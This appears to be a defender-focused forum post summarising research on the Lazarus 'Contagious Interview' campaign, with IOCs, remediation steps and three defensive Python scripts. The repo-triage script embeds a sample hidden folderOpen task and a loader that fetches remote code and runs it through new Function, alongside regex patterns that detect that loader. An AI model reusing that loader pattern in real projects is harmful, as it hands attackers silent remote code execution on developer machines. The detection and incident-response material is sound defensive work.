Hunting Lazarus Part IV: Real Blood on the Wire

This Red Asgard “Hunting Lazarus” series (Part I–IV, dated January 12, 2026 through February 3, 2026) is a high-signal write-up on the “Contagious Interview” fake-recruiter/fake-freelance workflow being used to deliver credential stealers and follow-on access. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-contagious-interview-c2-infrastructure))

What the 4 parts add up to (defender-focused)
  • Part I (initial repo booby-trap + infra mapping): Malicious “developer project” content using VSCode task auto-execution (run-on-folder-open) and JavaScript Function.constructor-style execution to pull/execute payloads; modular stealers/backdoor components; custom binary protocol on non-standard ports; and persistence/masquerading techniques (including filenames like “Runtime Broker.exe” and a startup “Windows Update Script.pyw”). ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-contagious-interview-c2-infrastructure))
  • Part II (dead drop resiliency): A documented shift from Pastebin-style dead drops to blockchain-based payload resolution (Polygon NFT contracts returning code), executed via “new Function(…, payload)” patterns; plus VM/sandbox evasion signals and a very fast time-to-compromise once the folder is opened and the workspace is trusted. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop))
  • Part III (second family + standardized hosting footprint): Discovery of an additional malware family (“OtterCookie”) operating alongside the earlier tooling, and a broader infrastructure picture with repeatable port fingerprints (notably BeaverTail on 1224 and OtterCookie on 5918 on the same servers), suggesting Infrastructure-as-Code style deployment and “ghost” C2 nodes not yet in public TI. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part3-infrastructure-too-perfect))
  • Part IV (validation it’s “real” + victim impact + AnyDesk backdoor): The authors state they confirmed operational impact by recovering large-scale stolen credential data and then describe follow-on persistence/remote access via AnyDesk (including credential injection into AnyDesk config), plus additional detection content (YARA set) and updated infra notes. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part4-real-blood-on-the-wire))

Practical takeaways for MalwareTips readers
  • Do not “test run” recruiter/freelancer repos on your daily machine. Use a disposable VM with no saved browser passwords, no wallet extensions, and no access to production credentials. This campaign explicitly relies on “clone and run it live while we watch” social engineering. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop))
  • Treat VSCode/Cursor workspace trust as a security boundary. The reported technique abuses tasks that trigger on folder open and hides execution output. The safest habit is: do not trust unknown workspaces; inspect .vscode/ and build scripts before anything runs. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-contagious-interview-c2-infrastructure))
  • Hunt for “developer-looking” persistence and living-off-the-land-style tradecraft, not just EXEs: suspicious .vscode tasks, unexpected Node.js execution chains, and “Function.constructor / new Function” patterns that build code from a remote response are major red flags in real projects. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-contagious-interview-c2-infrastructure))
  • Watch for remote admin tooling you didn’t install (especially AnyDesk in this series) and treat it as high priority to investigate, because it can represent persistent interactive access rather than “just” credential theft. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part4-real-blood-on-the-wire))
  • Network defenders: The series repeatedly highlights unusual port usage and consistent port groupings across nodes as a detection opportunity (1224/5918 and the higher custom ports in the 22411-22413 range). Focus on behavior plus port/protocol anomalies, not only static IOCs, because the same port fingerprint turns up on nodes that are not yet in any feed. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part3-infrastructure-too-perfect))
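The workspace-trust and dynamic-loader checks from the two bullets above, as an added example that is not Red Asgard's or MalwareTips' code: a small triage script you run over a cloned "interview project" before opening it in an editor. It flags a .vscode/tasks.json task set to run on folder open (and one that hides its output), and JavaScript that assembles code at runtime (new Function / Function.constructor / eval) next to a network fetch. The sample repo it writes to a temp directory is constructed for the demo.

```python
"""Pre-open triage of a cloned "interview project".

Added example (not Red Asgard's or MalwareTips' code). It looks for the two
signals the write-up describes: a .vscode/tasks.json task set to run when the
folder opens (often with its output hidden), and JavaScript that assembles code
at runtime (new Function / Function.constructor / eval) from a remote source.
The sample repo written to a temp directory below is constructed for the demo.
"""
import json
import re
import tempfile
from pathlib import Path

# Runtime code construction, the loader pattern the series attributes to BeaverTail.
DYNAMIC_CODE = re.compile(
    r"new\s+Function\s*\(|Function\s*\.\s*constructor|\beval\s*\(|Function\s*\(\s*['\"]")
# A fetch next to it means the body most likely arrives from the network (dead drop / C2).
REMOTE_FETCH = re.compile(r"\b(?:axios(?:\.\w+)?|fetch|https?\.get|request)\s*\(")
SOURCE_EXT = {".js", ".cjs", ".mjs", ".ts"}


def check_tasks_json(path: Path) -> list[str]:
    """Flag tasks that auto-run on folder open and tasks that suppress their output."""
    try:
        # VS Code accepts // comments in tasks.json; drop them before strict JSON parsing.
        raw = re.sub(r"^\s*//.*$", "", path.read_text(errors="replace"), flags=re.M)
        doc = json.loads(raw)
    except (OSError, ValueError) as exc:
        return [f"{path}: unparseable tasks.json ({exc}); treat as suspicious"]
    findings = []
    for task in doc.get("tasks", []):
        label = task.get("label", "<unnamed>")
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            findings.append(f"{path}: task '{label}' runs on folderOpen")
        pres = task.get("presentation", {})
        if pres.get("reveal") == "never" or pres.get("echo") is False:
            findings.append(f"{path}: task '{label}' hides its output")
    return findings


def check_js(path: Path) -> list[str]:
    """Flag dynamic code construction; note whether the code body is fetched remotely."""
    text = path.read_text(errors="replace")
    if not DYNAMIC_CODE.search(text):
        return []
    fed = "remote-fed " if REMOTE_FETCH.search(text) else ""
    return [f"{path}: {fed}dynamic code construction"]


def triage_repo(root: Path) -> list[str]:
    """Walk the checkout (skipping node_modules) and collect every finding."""
    findings = []
    for p in sorted(root.rglob("*")):
        if "node_modules" in p.parts or not p.is_file():
            continue
        if p.name == "tasks.json" and p.parent.name == ".vscode":
            findings += check_tasks_json(p)
        elif p.suffix in SOURCE_EXT:
            findings += check_js(p)
    return findings


# Constructed sample repo: the shape the write-up describes, not real malware.
SAMPLE_FILES = {
    ".vscode/tasks.json": json.dumps({
        "version": "2.0.0",
        "tasks": [{
            "label": "install deps",
            "type": "shell",
            "command": "node scripts/setup.js",
            "runOptions": {"runOn": "folderOpen"},
            "presentation": {"reveal": "never", "echo": False},
        }],
    }),
    "scripts/setup.js": (
        "const axios = require('axios');\n"
        "axios.get(process.env.CFG_URL)"
        ".then(r => new Function('require', r.data)(require));\n"
    ),
    "src/index.js": "console.log('hello');\n",
}


def build_sample_repo() -> Path:
    root = Path(tempfile.mkdtemp(prefix="interview-repo-"))
    for rel, body in SAMPLE_FILES.items():
        dest = root / rel
        dest.parent.mkdir(parents=True, exist_ok=True)
        dest.write_text(body)
    return root


if __name__ == "__main__":
    for line in triage_repo(build_sample_repo()):
        print("[!]", line)
```

Run it against the clone (`triage_repo(Path("/path/to/clone"))`) from the disposable VM, before the folder is opened in VS Code or Cursor; a clean repo returns an empty list. The regexes are deliberately loose: a hit is a reason to read the file, not a verdict, and a repo that passes can still be malicious (package.json scripts and postinstall hooks are a separate check).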

If someone already ran one of these “interview projects”
  • Disconnect the machine from the network.
  • From a known-clean device, rotate passwords (email first, then banking/crypto), and revoke active sessions where possible.
  • Check for AnyDesk (or other remote admin tools) that you did not intentionally deploy; remove it and treat the device as potentially backdoored if you can’t confidently validate it. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part4-real-blood-on-the-wire))
  • Run full scans with reputable AV/EDR; if strong compromise indicators exist (persistence + credential theft + remote access), prioritize a wipe/rebuild over “cleaning.”

Attribution note: Red Asgard assesses this as Lazarus/Contagious Interview-related; treat the TTPs and defensive guidance as actionable regardless of which exact subgroup is behind it. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-contagious-interview-c2-infrastructure))
 
Technical Analysis & Remediation

Campaign Mechanics & Attack Chain

The attack vector remains consistent with previous "Contagious Interview" waves.

Initial Access
Victims are lured via social engineering (fake recruiters) to download malicious repositories or join fake projects (e.g., elvengold[.]com, tokenloopz[.]com).

Execution
Malicious scripts (BeaverTail/InvisibleFerret) execute upon project initialization (e.g., npm start).

Persistence (New)
A Python-based AnyDesk RAT downloads the legitimate AnyDesk binary, installs it, and overwrites the local configuration to grant attackers unattended access.

MITRE ATT&CK Mapping

T1136.001 (Create Account: Local Account)
Injecting an unattended-access credential into service.conf creates a "shadow" access method. A loose fit, since no OS account is created, but the effect is the same: a second, attacker-owned credential that is unaffected by a Windows password reset.

T1219 (Remote Access Software)
Abuse of the legitimate, signed AnyDesk client for persistent interactive access.

T1071.001 (Web Protocols)
C2 communication via HTTP POST to /uploadInfo and /keys.

T1566.002 (Phishing: Spearphishing Link)
Lure domains disguised as blockchain/gaming projects.

Vulnerability Profile
CVE-2024-4577

Definition
PHP-CGI Argument Injection Vulnerability (CVSS 9.8).

CISA KEV Status
Active. Added June 12, 2024.

Relevance
The researchers attempted to exploit this against the Lazarus C2 (146[.]70[.]253[.]107), which runs XAMPP on Windows Server 2022. The exploit failed because the server executes PHP through mod_php rather than php-cgi (the CVE only reaches the CGI handler), but the resulting error messages leaked backend paths (C:\Users\Administrator\Documents\server2\Backend\).

Advisory
While this specific C2 was not vulnerable, XAMPP on Windows is a recurring fingerprint of this campaign's C2 hosting and is useful when pivoting to other nodes. Check the PHP handler (CGI versus module) before assuming the CVE applies to any XAMPP host you find.

Live Evidence & Indicators of Compromise (IOCs)

Refanged Network Indicators

Primary Operator C2

146[.]70[.]253[.]107 (Port 1224)

AnyDesk RAT C2
95[.]164[.]17[.]24 (Port 1224)

Binary Protocol C2
66[.]235[.]168[.]238 (Ports 22411-22413)

Lure Domains
elvengold[.]com, email[.]tokenloopz[.]com

Host-Based Indicators

Server-Side Path (C2 host, not a victim artifact)
C:\Users\Administrator\Documents\server2\Backend\ (leaked in PHP error output; useful for fingerprinting other operator nodes, not for endpoint hunting)

AnyDesk Config Injection

Unattended-access password hash written into service.conf (a configuration value, not a file hash)
967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d

Salt values seen alongside it
351535afd2d98b9a3a0e14905a60a345, e43673a2a77ed68fa6e8074167350f8f

Remediation - THE ENTERPRISE TRACK (SANS PICERL)

Phase 1: Identification & Containment

Network Block

Immediately block all outbound traffic to the C2 IPs (146[.]70[.]253[.]107, 95[.]164[.]17[.]24) and lure domains.

Endpoint Scan
Deploy a targeted hunt for the AnyDesk credential hash 967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d inside %ProgramData%\AnyDesk\service.conf (service installs), %AppData%\AnyDesk\service.conf (per-user installs) or ~/.anydesk/service.conf on Linux. Match it as a string inside the config file; a file-hash hunt will not find it.

Developer Audit
Review developer workstations (anything running Node.js dev servers, typically on localhost:3000 or localhost:5173) for recent connections to the identified IPs and ports.
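The endpoint-scan and developer-audit steps above, as an added example that is not Red Asgard's or MalwareTips' code: one script that checks an AnyDesk service.conf for the published credential and sweeps a connection log for the listed C2 addresses and the campaign's port fingerprints. The IOC values are the ones listed in this post; the ad.anynet.pwd_hash / ad.anynet.pwd_salt key names are the ones seen in public AnyDesk abuse reports (verify against a config from your own fleet); the INTERNAL ranges and the sample config and log lines are constructed.

```python
"""Phase 1 hunt helpers: AnyDesk service.conf check plus a connection-log sweep.

Added example (not Red Asgard's or MalwareTips' code). The IOC values are the
ones listed above; the ad.anynet.pwd_hash / ad.anynet.pwd_salt key names are
the ones seen in public AnyDesk abuse reports (verify against a config from
your own fleet); the INTERNAL ranges and the log lines are constructed.
"""
import ipaddress
import os
from pathlib import Path

IOC_PWD_HASH = "967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d"
IOC_SALTS = {"351535afd2d98b9a3a0e14905a60a345", "e43673a2a77ed68fa6e8074167350f8f"}
IOC_C2 = {                      # refanged from the indicator list above
    "146.70.253.107": {1224},
    "95.164.17.24": {1224},
    "66.235.168.238": set(range(22411, 22414)),
}
FINGERPRINT_PORTS = {1224, 5918, *range(22411, 22414)}   # campaign-wide port groupings
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def candidate_conf_paths() -> list[Path]:
    """Where service.conf lives for service, per-user and Linux installs."""
    paths = []
    for var in ("ProgramData", "AppData"):
        if os.environ.get(var):
            paths.append(Path(os.environ[var]) / "AnyDesk" / "service.conf")
    paths.append(Path.home() / ".anydesk" / "service.conf")
    return paths


def parse_anydesk_conf(text: str) -> dict[str, str]:
    """service.conf is flat key=value, one entry per line."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            k, _, v = line.partition("=")
            conf[k.strip()] = v.strip()
    return conf


def check_service_conf(text: str) -> list[str]:
    """Published credential -> confirmed; any unattended password -> verify provenance."""
    conf = parse_anydesk_conf(text)
    pwd_hash = conf.get("ad.anynet.pwd_hash", "")
    salt = conf.get("ad.anynet.pwd_salt", "")
    if pwd_hash == IOC_PWD_HASH or salt in IOC_SALTS:
        return ["service.conf carries the published Lazarus unattended-access credential"]
    if pwd_hash:
        return ["service.conf has an unattended-access password set; confirm who configured it"]
    return []


def sweep_connections(lines: list[str]) -> list[str]:
    """Lines are '<ts> <src_ip> <dst_ip> <dst_port>' (constructed, Zeek-like)."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, src, dst, port = parts[0], parts[1], parts[2], int(parts[3])
        if port in IOC_C2.get(dst, ()):
            hits.append(f"HIGH   {ts} {src} -> {dst}:{port} published C2")
        elif port in FINGERPRINT_PORTS and not any(ipaddress.ip_address(dst) in n for n in INTERNAL):
            hits.append(f"MEDIUM {ts} {src} -> {dst}:{port} campaign port fingerprint, host not yet in TI")
    return hits


SAMPLE_CONF = """\
ad.anynet.id=123456789
ad.anynet.pwd_hash=967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d
ad.anynet.pwd_salt=351535afd2d98b9a3a0e14905a60a345
"""
SAMPLE_CONN = [
    "2026-02-01T10:00:01Z 10.0.0.5 146.70.253.107 1224",   # published C2
    "2026-02-01T10:00:07Z 10.0.0.5 203.0.113.9 5918",      # unknown host, OtterCookie port
    "2026-02-01T10:01:00Z 10.0.0.5 10.0.0.20 3000",        # internal dev server, ignore
    "2026-02-01T10:02:00Z 10.0.0.8 198.51.100.7 443",      # ordinary HTTPS, ignore
]

if __name__ == "__main__":
    print(check_service_conf(SAMPLE_CONF))
    for p in candidate_conf_paths():
        if p.is_file():
            print(p, check_service_conf(p.read_text(errors="replace")))
    print("\n".join(sweep_connections(SAMPLE_CONN)))
```

The MEDIUM tier is the "ghost node" case from Part III: a destination that is not in any feed but answers on 1224/5918/22411-22413. Treat it as a lead to pivot on, not a block decision by itself. For fleet-wide use, push the same string match through your EDR's file-content search rather than walking hosts one at a time.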

Phase 2: Eradication

Remove Persistence

If the hash is found, copy service.conf and the AnyDesk trace logs (ad.trace, ad_svc.trace) off-host for the investigation, then uninstall AnyDesk completely. Deleting the config file is insufficient: the binary itself may have been replaced or modified by the RAT script, and a reinstall from the same script would simply rewrite the credential.

Kill Processes
Terminate WINSTART.exe and WINEXIT.exe processes associated with the binary beacon protocol.

Phase 3: Recovery

Credential Rotation

Force password resets for all developers who interacted with "freelance" interviews. This includes GitHub, NPM, cloud provider (AWS/Azure), and banking credentials.

Session Revocation
Invalidate all active sessions and refresh tokens (OIDC/SAML) for affected users, then re-enroll MFA where the stealer may have captured session cookies or TOTP seeds.

Phase 4: Lessons Learned

Policy Update

Prohibit the use of personal devices for corporate "take-home" coding assessments.

Detection Engineering
Create SIEM alerts for AnyDesk.exe spawning from unexpected directories or making HTTP POST requests to non-AnyDesk hosts (e.g., POST /keys). Because the RAT installs the genuine, signed AnyDesk binary into its normal location, also alert when AnyDesk.exe or its installer is spawned by a script interpreter (python.exe, pythonw.exe, node.exe) rather than by a user or a software-deployment agent.
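The two alerts above expressed as executable rule logic, as an added example that is not Red Asgard's or MalwareTips' code. Events are minimal Sysmon-style dicts; EXPECTED_DIRS, the *.anydesk.com suffix and all sample events are assumptions to align with your own AnyDesk deployment before turning this into a Sigma rule or SIEM query.

```python
"""The two alerts above as executable rule logic, run over constructed events.

Added example (not Red Asgard's or MalwareTips' code). Events are minimal
Sysmon-style dicts; EXPECTED_DIRS and the *.anydesk.com suffix are assumptions
to align with your own AnyDesk deployment. Because the RAT script installs the
genuine, signed AnyDesk binary, a path check alone is not enough, so the rule
also alerts when AnyDesk.exe is spawned by a script interpreter.
"""
from pathlib import PureWindowsPath
from typing import Optional

# Sanctioned install locations (assumed; the last one is matched as a suffix under any profile).
EXPECTED_DIRS = {r"c:\program files (x86)\anydesk", r"c:\programdata\anydesk"}
EXPECTED_USER_SUBDIR = r"\appdata\roaming\anydesk"
# Interpreters tied to the campaign's installer/stealer scripts (Python RAT, Node stealers).
SCRIPT_PARENTS = {"python.exe", "pythonw.exe", "node.exe", "wscript.exe", "cscript.exe"}
# URIs the write-up attributes to the C2 (T1071.001).
C2_URIS = {"/uploadinfo", "/keys"}
ANYDESK_SUFFIX = ".anydesk.com"


def rule_anydesk_process(ev: dict) -> Optional[str]:
    """Alert on AnyDesk.exe from an unexpected directory or launched by a script engine."""
    if ev.get("type") != "process":
        return None
    image = PureWindowsPath(ev["image"])
    if image.name.lower() != "anydesk.exe":
        return None
    parent_img = PureWindowsPath(ev.get("parent_image", "")).name.lower()
    if parent_img in SCRIPT_PARENTS:
        return f"AnyDesk.exe launched by script interpreter {parent_img}: {ev['image']}"
    folder = str(image.parent).lower()
    if folder not in EXPECTED_DIRS and not folder.endswith(EXPECTED_USER_SUBDIR):
        return f"AnyDesk.exe running from unexpected directory: {image.parent}"
    return None


def rule_c2_post(ev: dict) -> Optional[str]:
    """Alert on POST /uploadInfo or /keys to anything that is not AnyDesk's backend."""
    if ev.get("type") != "http" or ev.get("method", "").upper() != "POST":
        return None
    host = ev.get("host", "").lower()
    if host.endswith(ANYDESK_SUFFIX):
        return None
    uri = ev.get("uri", "").split("?", 1)[0].lower()
    if uri in C2_URIS:
        return f"POST {ev['uri']} to non-AnyDesk host {host} from {ev.get('image', '?')}"
    return None


RULES = (rule_anydesk_process, rule_c2_post)


def run_rules(events: list[dict]) -> list[str]:
    return [hit for ev in events for rule in RULES if (hit := rule(ev))]


# Constructed events; real ones would come from Sysmon EID 1 and proxy or Zeek http logs.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "parent_image": r"C:\Windows\explorer.exe"},                                   # sanctioned
    {"type": "process", "image": r"C:\Users\dev\AppData\Local\Temp\AnyDesk.exe",
     "parent_image": r"C:\Windows\explorer.exe"},                                   # wrong place
    {"type": "process", "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Python\Python312\pythonw.exe"},  # RAT install
    {"type": "http", "method": "POST", "host": "api.github.com", "uri": "/graphql",
     "image": "node.exe"},                                                          # ordinary dev traffic
    {"type": "http", "method": "POST", "host": "146.70.253.107", "uri": "/uploadInfo",
     "image": "node.exe"},                                                          # stealer check-in
    {"type": "http", "method": "GET", "host": "146.70.253.107", "uri": "/keys",
     "image": "node.exe"},                                                          # not a POST, no alert
]

if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print("[ALERT]", alert)
```

The third sample event is the one the path-only rule misses: a correctly placed, correctly signed AnyDesk.exe whose parent is pythonw.exe. In a real deployment, tune SCRIPT_PARENTS against your software-deployment tooling so a sanctioned scripted rollout does not page the on-call.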

Remediation - THE HOME USER TRACK

Priority 1: Safety & Isolation

Immediate Disconnect

If you suspect you ran a "job interview" coding test recently, disconnect the machine from the internet immediately.

Check AnyDesk
Open your AnyDesk settings (or configuration file if you are technical) and check for unauthorized "Unattended Access" profiles. If you didn't set it up, assume it's malicious.

Priority 2: Identity Hygiene

Mass Reset

The malware steals browser databases (Chrome/Firefox/Edge stored passwords). You must assume every password saved in your browser is compromised. Reset them from a clean device (like your phone).

Wallet Check
Move funds from hot wallets (MetaMask, Phantom, etc.) to a new cold wallet immediately.

Priority 3: Persistence Removal

Uninstall Remote Tools

Uninstall AnyDesk, TeamViewer, or other remote desktop tools unless strictly necessary. Re-download them only from official sources if needed later.

Hardening & References

CIS Benchmark (Windows)

Ensure Remote Assistance is set to Disabled (18.6.1 in the cited benchmark). Remote Assistance rides on the RDP stack, so turning it off removes one more unattended-access path that does not depend on AnyDesk.

AppLocker/WDAC
Block execution of unsigned scripts from user Downloads and Temp folders. Note that AppLocker script rules cover Windows Script Host and PowerShell file types (.js under wscript/cscript, .vbs, .ps1, .bat, .cmd) but not .py or Node-executed .js; to constrain those, apply executable rules to python.exe and node.exe (or a WDAC policy) so interpreters only run from sanctioned locations.

Sources

Red Asgard Threat Research Team

Complete Investigation Series (Red Asgard)

Official Reporting Channels

FBI IC3 (Internet Crime Complaint Center)
Report filed covering 121 victims and the recovered banking credentials.

CISA (Cybersecurity and Infrastructure Security Agency)
Supplementary report filed regarding the full scope of 857 victims.
 